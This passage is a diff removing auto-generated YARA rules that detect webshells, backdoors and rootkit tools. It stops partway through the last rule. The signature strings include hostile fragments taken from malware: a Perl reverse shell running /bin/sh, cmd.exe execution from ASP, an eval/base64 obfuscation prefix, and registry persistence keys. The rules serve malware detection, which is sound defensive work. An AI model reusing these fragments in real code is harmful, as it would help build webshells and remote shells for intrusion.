-		$s0 = "eval(gzinflate(str_rot13(base64_decode('"
-	condition:
-		all of them
-}
-rule Debug_BDoor {
-	meta:
-		description = "Webshells Auto-generated - file BDoor.dll"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "e4e8e31dd44beb9320922c5f49739955"
-	strings:
-		$s1 = "\\BDoor\\"
-		$s4 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
-	condition:
-		all of them
-}
-rule bin_Client {
-	meta:
-		description = "Webshells Auto-generated - file Client.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "5f91a5b46d155cacf0cc6673a2a5461b"
-	strings:
-		$s0 = "Recieved respond from server!!"
-		$s4 = "packet door client"
-		$s5 = "input source port(whatever you want):"
-		$s7 = "Packet sent,waiting for reply..."
-	condition:
-		all of them
-}
-rule ZXshell2_0_rar_Folder_ZXshell {
-	meta:
-		description = "Webshells Auto-generated - file ZXshell.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "246ce44502d2f6002d720d350e26c288"
-	strings:
-		$s0 = "WPreviewPagesn"
-		$s1 = "DA!OLUTELY N"
-	condition:
-		all of them
-}
-rule RkNTLoad {
-	meta:
-		description = "Webshells Auto-generated - file RkNTLoad.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "262317c95ced56224f136ba532b8b34f"
-	strings:
-		$s1 = "$Info: This file is packed with the UPX executable packer http://upx.tsx.org $"
-		$s2 = "5pur+virtu!"
-		$s3 = "ugh spac#n"
-		$s4 = "xcEx3WriL4"
-		$s5 = "runtime error"
-		$s6 = "loseHWait.Sr."
-		$s7 = "essageBoxAw"
-		$s8 = "$Id: UPX 1.07 Copyright (C) 1996-2001 the UPX Team. All Rights Reserved. $"
-	condition:
-		all of them
-}
-rule binder2_binder2 {
-	meta:
-		description = "Webshells Auto-generated - file binder2.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "d594e90ad23ae0bc0b65b59189c12f11"
-	strings:
-		$s0 = "IsCharAlphaNumericA"
-		$s2 = "WideCharToM"
-		$s4 = "g 5pur+virtu!"
-		$s5 = "\\syslog.en"
-		$s6 = "heap7'7oqk?not="
-		$s8 = "- Kablto in"
-	condition:
-		all of them
-}
-rule thelast_orice2 {
-	meta:
-		description = "Webshells Auto-generated - file orice2.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "aa63ffb27bde8d03d00dda04421237ae"
-	strings:
-		$s0 = " $aa = $_GET['aa'];"
-		$s1 = "echo $aa;"
-	condition:
-		all of them
-}
-rule FSO_s_sincap {
-	meta:
-		description = "Webshells Auto-generated - file sincap.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "dc5c2c2392b84a1529abd92e98e9aa5b"
-	strings:
-		$s0 = "    <font color=\"#E5E5E5\" style=\"font-size: 8pt; font-weight: 700\" face=\"Arial\">"
-		$s4 = "<body text=\"#008000\" bgcolor=\"#808080\" topmargin=\"0\" leftmargin=\"0\" rightmargin="
-	condition:
-		all of them
-}
-rule PhpShell {
-	meta:
-		description = "Webshells Auto-generated - file PhpShell.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "539baa0d39a9cf3c64d65ee7a8738620"
-	strings:
-		$s2 = "href=\"http://www.gimpster.com/wiki/PhpShell\">www.gimpster.com/wiki/PhpShell</a>."
-	condition:
-		all of them
-}
-rule HYTop_DevPack_config {
-	meta:
-		description = "Webshells Auto-generated - file config.asp"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "b41d0e64e64a685178a3155195921d61"
-	strings:
-		$s0 = "const adminPassword=\""
-		$s2 = "const userPassword=\""
-		$s3 = "const mVersion="
-	condition:
-		all of them
-}
-rule sendmail {
-	meta:
-		description = "Webshells Auto-generated - file sendmail.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "75b86f4a21d8adefaf34b3a94629bd17"
-	strings:
-		$s3 = "_NextPyC808"
-		$s6 = "Copyright (C) 2000, Diamond Computer Systems Pty. Ltd. (www.diamondcs.com.au)"
-	condition:
-		all of them
-}
-rule FSO_s_zehir4 {
-	meta:
-		description = "Webshells Auto-generated - file zehir4.asp"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "5b496a61363d304532bcf52ee21f5d55"
-	strings:
-		$s5 = " byMesaj "
-	condition:
-		all of them
-}
-rule hkshell_hkshell {
-	meta:
-		description = "Webshells Auto-generated - file hkshell.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "168cab58cee59dc4706b3be988312580"
-	strings:
-		$s1 = "PrSessKERNELU"
-		$s2 = "Cur3ntV7sion"
-		$s3 = "Explorer8"
-	condition:
-		all of them
-}
-
-rule iMHaPFtp {
-	meta:
-		description = "Webshells Auto-generated - file iMHaPFtp.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "12911b73bc6a5d313b494102abcf5c57"
-	strings:
-		$s1 = "echo \"\\t<th class=\\\"permission_header\\\"><a href=\\\"$self?{$d}sort=permission$r\\\">"
-	condition:
-		all of them
-}
-rule Unpack_TBack {
-	meta:
-		description = "Webshells Auto-generated - file TBack.dll"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "a9d1007823bf96fb163ab38726b48464"
-	strings:
-		$s5 = "\\final\\new\\lcc\\public.dll"
-	condition:
-		all of them
-}
-rule DarkSpy105 {
-	meta:
-		description = "Webshells Auto-generated - file DarkSpy105.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "f0b85e7bec90dba829a3ede1ab7d8722"
-	strings:
-		$s7 = "Sorry,DarkSpy got an unknown exception,please re-run it,thanks!"
-	condition:
-		all of them
-}
-rule EditServer_3 {
-	meta:
-		description = "Webshells Auto-generated - file EditServer.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "f945de25e0eba3bdaf1455b3a62b9832"
-	strings:
-		$s2 = "Server %s Have Been Configured"
-		$s5 = "The Server Password Exceeds 32 Characters"
-		$s8 = "9--Set Procecess Name To Inject DLL"
-	condition:
-		all of them
-}
-rule FSO_s_reader {
-	meta:
-		description = "Webshells Auto-generated - file reader.asp"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "b598c8b662f2a1f6cc61f291fb0a6fa2"
-	strings:
-		$s2 = "mailto:mailbomb@hotmail."
-	condition:
-		all of them
-}
-rule ASP_CmdAsp {
-	meta:
-		description = "Webshells Auto-generated - file CmdAsp.asp"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "79d4f3425f7a89befb0ef3bafe5e332f"
-	strings:
-		$s2 = "' -- Read the output from our command and remove the temp file -- '"
-		$s6 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)"
-		$s9 = "' -- create the COM objects that we will be using -- '"
-	condition:
-		all of them
-}
-rule KA_uShell {
-	meta:
-		description = "Webshells Auto-generated - file KA_uShell.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "685f5d4f7f6751eaefc2695071569aab"
-	strings:
-		$s5 = "if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass"
-		$s6 = "if ($_POST['path']==\"\"){$uploadfile = $_FILES['file']['name'];}"
-	condition:
-		all of them
-}
-rule PHP_Backdoor_v1 {
-	meta:
-		description = "Webshells Auto-generated - file PHP Backdoor v1.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "0506ba90759d11d78befd21cabf41f3d"
-	strings:
-
-		$s5 = "echo\"<form method=\\\"POST\\\" action=\\\"\".$_SERVER['PHP_SELF'].\"?edit=\".$th"
-		$s8 = "echo \"<a href=\\\"\".$_SERVER['PHP_SELF'].\"?proxy"
-	condition:
-		all of them
-}
-rule svchostdll {
-	meta:
-		description = "Webshells Auto-generated - file svchostdll.dll"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "0f6756c8cb0b454c452055f189e4c3f4"
-	strings:
-		$s0 = "InstallService"
-		$s1 = "RundllInstallA"
-		$s2 = "UninstallService"
-		$s3 = "&G3 Users In RegistryD"
-		$s4 = "OL_SHUTDOWN;I"
-		$s5 = "SvcHostDLL.dll"
-		$s6 = "RundllUninstallA"
-		$s7 = "InternetOpenA"
-		$s8 = "Check Cloneomplete"
-	condition:
-		all of them
-}
-rule HYTop_DevPack_server {
-	meta:
-		description = "Webshells Auto-generated - file server.asp"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "1d38526a215df13c7373da4635541b43"
-	strings:
-		$s0 = "<!-- PageServer Below -->"
-	condition:
-		all of them
-}
-rule vanquish {
-	meta:
-		description = "Webshells Auto-generated - file vanquish.dll"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "684450adde37a93e8bb362994efc898c"
-	strings:
-		$s3 = "You cannot delete protected files/folders! Instead, your attempt has been logged"
-		$s8 = "?VCreateProcessA@@YGHPBDPADPAU_SECURITY_ATTRIBUTES@@2HKPAX0PAU_STARTUPINFOA@@PAU"
-		$s9 = "?VFindFirstFileExW@@YGPAXPBGW4_FINDEX_INFO_LEVELS@@PAXW4_FINDEX_SEARCH_OPS@@2K@Z"
-	condition:
-		all of them
-}
-rule winshell {
-	meta:
-		description = "Webshells Auto-generated - file winshell.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "3144410a37dd4c29d004a814a294ea26"
-	strings:
-		$s0 = "Software\\Microsoft\\Windows\\CurrentVersion\\RunServices"
-		$s1 = "WinShell Service"
-		$s2 = "__GLOBAL_HEAP_SELECTED"
-		$s3 = "__MSVCRT_HEAP_SELECT"
-		$s4 = "Provide Windows CmdShell Service"
-		$s5 = "URLDownloadToFileA"
-		$s6 = "RegisterServiceProcess"
-		$s7 = "GetModuleBaseNameA"
-		$s8 = "WinShell v5.0 (C)2002 janker.org"
-	condition:
-		all of them
-}
-rule FSO_s_remview {
-	meta:
-		description = "Webshells Auto-generated - file remview.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "b4a09911a5b23e00b55abe546ded691c"
-	strings:
-		$s2 = "      echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\""
-		$s3 = "         echo \"<script>str$i=\\\"\".str_replace(\"\\\"\",\"\\\\\\\"\",str_replace(\"\\\\\",\"\\\\\\\\\""
-		$s4 = "      echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<"
-	condition:
-		all of them
-}
-rule saphpshell {
-	meta:
-		description = "Webshells Auto-generated - file saphpshell.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "d7bba8def713512ddda14baf9cd6889a"
-	strings:
-		$s0 = "<td><input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_POST['command']?>"
-	condition:
-		all of them
-}
-rule HYTop2006_rar_Folder_2006Z {
-	meta:
-		description = "Webshells Auto-generated - file 2006Z.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "fd1b6129abd4ab177fed135e3b665488"
-	strings:
-		$s1 = "wangyong,czy,allen,lcx,Marcos,kEvin1986,myth"
-		$s8 = "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x"
-	condition:
-		all of them
-}
-rule admin_ad {
-	meta:
-		description = "Webshells Auto-generated - file admin-ad.asp"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "e6819b8f8ff2f1073f7d46a0b192f43b"
-	strings:
-		$s6 = "<td align=\"center\"> <input name=\"cmd\" type=\"text\" id=\"cmd\" siz"
-		$s7 = "Response.write\"<a href='\"&url&\"?path=\"&Request(\"oldpath\")&\"&attrib=\"&attrib&\"'><"
-	condition:
-		all of them
-}
-rule FSO_s_casus15 {
-	meta:
-		description = "Webshells Auto-generated - file casus15.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "8d155b4239d922367af5d0a1b89533a3"
-	strings:
-		$s6 = "if((is_dir(\"$deldir/$file\")) AND ($file!=\".\") AND ($file!=\"..\"))"
-	condition:
-		all of them
-}
-rule BIN_Client {
-	meta:
-		description = "Webshells Auto-generated - file Client.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "9f0a74ec81bc2f26f16c5c172b80eca7"
-	strings:
-		$s0 = "=====Remote Shell Closed====="
-		$s2 = "All Files(*.*)|*.*||"
-		$s6 = "WSAStartup Error!"
-		$s7 = "SHGetFileInfoA"
-		$s8 = "CreateThread False!"
-		$s9 = "Port Number Error"
-	condition:
-		4 of them
-}
-rule shelltools_g0t_root_uptime {
-	meta:
-		description = "Webshells Auto-generated - file uptime.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "d1f56102bc5d3e2e37ab3ffa392073b9"
-	strings:
-		$s0 = "JDiamondCSlC~"
-		$s1 = "CharactQA"
-		$s2 = "$Info: This file is packed with the UPX executable packer $"
-		$s5 = "HandlereateConso"
-		$s7 = "ION\\System\\FloatingPo"
-	condition:
-		all of them
-}
-rule Simple_PHP_BackDooR {
-	meta:
-		description = "Webshells Auto-generated - file Simple_PHP_BackDooR.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "a401132363eecc3a1040774bec9cb24f"
-	strings:
-		$s0 = "<hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory he"
-		$s6 = "if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fn"
-		$s9 = "// a simple php backdoor"
-	condition:
-		1 of them
-}
-rule sig_2005Gray {
-	meta:
-		description = "Webshells Auto-generated - file 2005Gray.asp"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "75dbe3d3b70a5678225d3e2d78b604cc"
-	strings:
-		$s0 = "SCROLLBAR-FACE-COLOR: #e8e7e7;"
-		$s4 = "echo \"&nbsp;<a href=\"\"/\"&encodeForUrl(theHref,false)&\"\"\" target=_blank>\"&replace"
-		$s8 = "theHref=mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\"),2)"
-		$s9 = "SCROLLBAR-3DLIGHT-COLOR: #cccccc;"
-	condition:
-		all of them
-}
-rule DllInjection {
-	meta:
-		description = "Webshells Auto-generated - file DllInjection.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "a7b92283a5102886ab8aee2bc5c8d718"
-	strings:
-		$s0 = "\\BDoor\\DllInjecti"
-	condition:
-		all of them
-}
-rule Mithril_v1_45_Mithril {
-	meta:
-		description = "Webshells Auto-generated - file Mithril.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "f1484f882dc381dde6eaa0b80ef64a07"
-	strings:
-		$s2 = "cress.exe"
-		$s7 = "\\Debug\\Mithril."
-	condition:
-		all of them
-}
-rule hkshell_hkrmv {
-	meta:
-		description = "Webshells Auto-generated - file hkrmv.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "bd3a0b7a6b5536f8d96f50956560e9bf"
-	strings:
-		$s5 = "/THUMBPOSITION7"
-		$s6 = "\\EvilBlade\\"
-	condition:
-		all of them
-}
-rule phpshell {
-	meta:
-		description = "Webshells Auto-generated - file phpshell.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "1dccb1ea9f24ffbd085571c88585517b"
-	strings:
-		$s1 = "echo \"<input size=\\\"100\\\" type=\\\"text\\\" name=\\\"newfile\\\" value=\\\"$inputfile\\\"><b"
-		$s2 = "$img[$id] = \"<img height=\\\"16\\\" width=\\\"16\\\" border=\\\"0\\\" src=\\\"$REMOTE_IMAGE_UR"
-		$s3 = "$file = str_replace(\"\\\\\", \"/\", str_replace(\"//\", \"/\", str_replace(\"\\\\\\\\\", \"\\\\\", "
-	condition:
-		all of them
-}
-rule FSO_s_cmd {
-	meta:
-		description = "Webshells Auto-generated - file cmd.asp"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "cbe8e365d41dd3cd8e462ca434cf385f"
-	strings:
-		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>"
-		$s1 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)"
-	condition:
-		all of them
-}
-rule FeliksPack3___PHP_Shells_phpft {
-	meta:
-		description = "Webshells Auto-generated - file phpft.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "60ef80175fcc6a879ca57c54226646b1"
-	strings:
-		$s6 = "PHP Files Thief"
-		$s11 = "http://www.4ngel.net"
-	condition:
-		all of them
-}
-rule FSO_s_indexer {
-	meta:
-		description = "Webshells Auto-generated - file indexer.asp"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "135fc50f85228691b401848caef3be9e"
-	strings:
-		$s3 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input type=\"r"
-	condition:
-		all of them
-}
-rule r57shell {
-	meta:
-		description = "Webshells Auto-generated - file r57shell.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "8023394542cddf8aee5dec6072ed02b5"
-	strings:
-		$s11 = " $_POST['cmd']=\"echo \\\"Now script try connect to"
-	condition:
-		all of them
-}
-rule bdcli100 {
-	meta:
-		description = "Webshells Auto-generated - file bdcli100.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "b12163ac53789fb4f62e4f17a8c2e028"
-	strings:
-		$s5 = "unable to connect to "
-		$s8 = "backdoor is corrupted on "
-	condition:
-		all of them
-}
-rule HYTop_DevPack_2005Red {
-	meta:
-		description = "Webshells Auto-generated - file 2005Red.asp"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "d8ccda2214b3f6eabd4502a050eb8fe8"
-	strings:
-		$s0 = "scrollbar-darkshadow-color:#FF9DBB;"
-		$s3 = "echo \"&nbsp;<a href=\"\"/\"&encodeForUrl(theHref,false)&\"\"\" target=_blank>\"&replace"
-		$s9 = "theHref=mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\"),2)"
-	condition:
-		all of them
-}
-rule HYTop2006_rar_Folder_2006X2 {
-	meta:
-		description = "Webshells Auto-generated - file 2006X2.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "cc5bf9fc56d404ebbc492855393d7620"
-	strings:
-		$s2 = "Powered By "
-		$s3 = " \" onClick=\"this.form.sharp.name=this.form.password.value;this.form.action=this."
-	condition:
-		all of them
-}
-rule rdrbs084 {
-	meta:
-		description = "Webshells Auto-generated - file rdrbs084.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "ed30327b255816bdd7590bf891aa0020"
-	strings:
-		$s0 = "Create mapped port. You have to specify domain when using HTTP type."
-		$s8 = "<LOCAL PORT> <MAPPING SERVER> <MAPPING SERVER PORT> <TARGET SERVER> <TARGET"
-	condition:
-		all of them
-}
-rule HYTop_CaseSwitch_2005 {
-	meta:
-		description = "Webshells Auto-generated - file 2005.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "8bf667ee9e21366bc0bd3491cb614f41"
-	strings:
-		$s1 = "MSComDlg.CommonDialog"
-		$s2 = "CommonDialog1"
-		$s3 = "__vbaExceptHandler"
-		$s4 = "EVENT_SINK_Release"
-		$s5 = "EVENT_SINK_AddRef"
-		$s6 = "By Marcos"
-		$s7 = "EVENT_SINK_QueryInterface"
-		$s8 = "MethCallEngine"
-	condition:
-		all of them
-}
-rule eBayId_index3 {
-	meta:
-		description = "Webshells Auto-generated - file index3.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "0412b1e37f41ea0d002e4ed11608905f"
-	strings:
-		$s8 = "$err = \"<i>Your Name</i> Not Entered!</font></h2>Sorry, \\\"You"
-	condition:
-		all of them
-}
-rule FSO_s_phvayv {
-	meta:
-		description = "Webshells Auto-generated - file phvayv.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "205ecda66c443083403efb1e5c7f7878"
-	strings:
-		$s2 = "wrap=\"OFF\">XXXX</textarea></font><font face"
-	condition:
-		all of them
-}
-rule byshell063_ntboot {
-	meta:
-		description = "Webshells Auto-generated - file ntboot.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "99b5f49db6d6d9a9faeffb29fd8e6d8c"
-	strings:
-		$s0 = "SYSTEM\\CurrentControlSet\\Services\\NtBoot"
-		$s1 = "Failure ... Access is Denied !"
-		$s2 = "Dumping Description to Registry..."
-		$s3 = "Opening Service .... Failure !"
-	condition:
-		all of them
-}
-rule FSO_s_casus15_2 {
-	meta:
-		description = "Webshells Auto-generated - file casus15.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "8d155b4239d922367af5d0a1b89533a3"
-	strings:
-		$s0 = "copy ( $dosya_gonder"
-	condition:
-		all of them
-}
-rule installer {
-	meta:
-		description = "Webshells Auto-generated - file installer.cmd"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "a507919ae701cf7e42fa441d3ad95f8f"
-	strings:
-		$s0 = "Restore Old Vanquish"
-		$s4 = "ReInstall Vanquish"
-	condition:
-		all of them
-}
-rule uploader {
-	meta:
-		description = "Webshells Auto-generated - file uploader.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "b9a9aab319964351b46bd5fc9d6246a8"
-	strings:
-		$s0 = "move_uploaded_file($userfile, \"entrika.php\"); "
-	condition:
-		all of them
-}
-rule FSO_s_remview_2 {
-	meta:
-		description = "Webshells Auto-generated - file remview.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "b4a09911a5b23e00b55abe546ded691c"
-	strings:
-		$s0 = "<xmp>$out</"
-		$s1 = ".mm(\"Eval PHP code\")."
-	condition:
-		all of them
-}
-rule FeliksPack3___PHP_Shells_r57 {
-	meta:
-		description = "Webshells Auto-generated - file r57.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "903908b77a266b855262cdbce81c3f72"
-	strings:
-		$s1 = "$sql = \"LOAD DATA INFILE \\\"\".$_POST['test3_file']."
-	condition:
-		all of them
-}
-rule HYTop2006_rar_Folder_2006X {
-	meta:
-		description = "Webshells Auto-generated - file 2006X.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "cf3ee0d869dd36e775dfcaa788db8e4b"
-	strings:
-		$s1 = "<input name=\"password\" type=\"password\" id=\"password\""
-		$s6 = "name=\"theAction\" type=\"text\" id=\"theAction\""
-	condition:
-		all of them
-}
-rule FSO_s_phvayv_2 {
-	meta:
-		description = "Webshells Auto-generated - file phvayv.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "205ecda66c443083403efb1e5c7f7878"
-	strings:
-		$s2 = "rows=\"24\" cols=\"122\" wrap=\"OFF\">XXXX</textarea></font><font"
-	condition:
-		all of them
-}
-rule elmaliseker {
-	meta:
-		description = "Webshells Auto-generated - file elmaliseker.asp"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "ccf48af0c8c09bbd038e610a49c9862e"
-	strings:
-		$s0 = "javascript:Command('Download'"
-		$s5 = "zombie_array=array("
-	condition:
-		all of them
-}
-rule shelltools_g0t_root_resolve {
-	meta:
-		description = "Webshells Auto-generated - file resolve.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "69bf9aa296238610a0e05f99b5540297"
-	strings:
-		$s0 = "3^n6B(Ed3"
-		$s1 = "^uldn'Vt(x"
-		$s2 = "\\= uPKfp"
-		$s3 = "'r.axV<ad"
-		$s4 = "p,modoi$=sr("
-		$s5 = "DiamondC8S t"
-		$s6 = "`lQ9fX<ZvJW"
-	condition:
-		all of them
-}
-rule FSO_s_RemExp {
-	meta:
-		description = "Webshells Auto-generated - file RemExp.asp"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "b69670ecdbb40012c73686cd22696eeb"
-	strings:
-		$s1 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=SubFolder.Name%>\"> <a href= \"<%=Request.Ser"
-		$s5 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f=<%=F"
-		$s6 = "<td bgcolor=\"<%=BgColor%>\" align=\"right\"><%=Attributes(SubFolder.Attributes)%></"
-	condition:
-		all of them
-}
-rule FSO_s_tool {
-	meta:
-		description = "Webshells Auto-generated - file tool.asp"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "3a1e1e889fdd974a130a6a767b42655b"
-	strings:
-		$s7 = "\"\"%windir%\\\\calc.exe\"\")"
-	condition:
-		all of them
-}
-rule FeliksPack3___PHP_Shells_2005 {
-	meta:
-		description = "Webshells Auto-generated - file 2005.asp"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "97f2552c2fafc0b2eb467ee29cc803c8"
-	strings:
-		$s0 = "window.open(\"\"&url&\"?id=edit&path=\"+sfile+\"&op=copy&attrib=\"+attrib+\"&dpath=\"+lp"
-		$s3 = "<input name=\"dbname\" type=\"hidden\" id=\"dbname\" value=\"<%=request(\"dbname\")%>\">"
-	condition:
-		all of them
-}
-rule byloader {
-	meta:
-		description = "Webshells Auto-generated - file byloader.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "0f0d6dc26055653f5844ded906ce52df"
-	strings:
-		$s0 = "SYSTEM\\CurrentControlSet\\Services\\NtfsChk"
-		$s1 = "Failure ... Access is Denied !"
-		$s2 = "NTFS Disk Driver Checking Service"
-		$s3 = "Dumping Description to Registry..."
-		$s4 = "Opening Service .... Failure !"
-	condition:
-		all of them
-}
-rule shelltools_g0t_root_Fport {
-	meta:
-		description = "Webshells Auto-generated - file Fport.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "dbb75488aa2fa22ba6950aead1ef30d5"
-	strings:
-		$s4 = "Copyright 2000 by Foundstone, Inc."
-		$s5 = "You must have administrator privileges to run fport - exiting..."
-	condition:
-		all of them
-}
-rule BackDooR__fr_ {
-	meta:
-		description = "Webshells Auto-generated - file BackDooR (fr).php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "a79cac2cf86e073a832aaf29a664f4be"
-	strings:
-		$s3 = "print(\"<p align=\\\"center\\\"><font size=\\\"5\\\">Exploit include "
-	condition:
-		all of them
-}
-rule FSO_s_ntdaddy {
-	meta:
-		description = "Webshells Auto-generated - file ntdaddy.asp"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "f6262f3ad9f73b8d3e7d9ea5ec07a357"
-	strings:
-		$s1 = "<input type=\"text\" name=\".CMD\" size=\"45\" value=\"<%= szCMD %>\"> <input type=\"s"
-	condition:
-		all of them
-}
-rule nstview_nstview {
-	meta:
-		description = "Webshells Auto-generated - file nstview.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "3871888a0c1ac4270104918231029a56"
-	strings:
-		$s4 = "open STDIN,\\\"<&X\\\";open STDOUT,\\\">&X\\\";open STDERR,\\\">&X\\\";exec(\\\"/bin/sh -i\\\");"
-	condition:
-		all of them
-}
-rule HYTop_DevPack_upload {
-	meta:
-		description = "Webshells Auto-generated - file upload.asp"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "b09852bda534627949f0259828c967de"
-	strings:
-		$s0 = "<!-- PageUpload Below -->"
-	condition:
-		all of them
-}
-rule PasswordReminder {
-	meta:
-		description = "Webshells Auto-generated - file PasswordReminder.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "ea49d754dc609e8bfa4c0f95d14ef9bf"
-	strings:
-		$s3 = "The encoded password is found at 0x%8.8lx and has a length of %d."
-	condition:
-		all of them
-}
-rule Pack_InjectT {
-	meta:
-		description = "Webshells Auto-generated - file InjectT.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "983b74ccd57f6195a0584cdfb27d55e8"
-	strings:
-		$s3 = "ail To Open Registry"
-		$s4 = "32fDssignim"
-		$s5 = "vide Internet S"
-		$s6 = "d]Software\\M"
-		$s7 = "TInject.Dll"
-	condition:
-		all of them
-}
-rule FSO_s_RemExp_2 {
-	meta:
-		description = "Webshells Auto-generated - file RemExp.asp"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "b69670ecdbb40012c73686cd22696eeb"
-	strings:
-		$s2 = " Then Response.Write \""
-		$s3 = "<a href= \"<%=Request.ServerVariables(\"script_name\")%>"
-	condition:
-		all of them
-}
-rule FSO_s_c99 {
-	meta:
-		description = "Webshells Auto-generated - file c99.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "5f9ba02eb081bba2b2434c603af454d0"
-	strings:
-		$s2 = "\"txt\",\"conf\",\"bat\",\"sh\",\"js\",\"bak\",\"doc\",\"log\",\"sfc\",\"cfg\",\"htacce"
-	condition:
-		all of them
-}
-rule rknt_zip_Folder_RkNT {
-	meta:
-		description = "Webshells Auto-generated - file RkNT.dll"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "5f97386dfde148942b7584aeb6512b85"
-	strings:
-		$s0 = "PathStripPathA"
-		$s1 = "`cLGet!Addr%"
-		$s2 = "$Info: This file is packed with the UPX executable packer http://upx.tsx.org $"
-		$s3 = "oQToOemBuff* <="
-		$s4 = "ionCdunAsw[Us'"
-		$s6 = "CreateProcessW: %S"
-		$s7 = "ImageDirectoryEntryToData"
-	condition:
-		all of them
-}
-rule dbgntboot {
-	meta:
-		description = "Webshells Auto-generated - file dbgntboot.dll"
-		author = "Yara Bulk Rule Generator by Florian Roth"
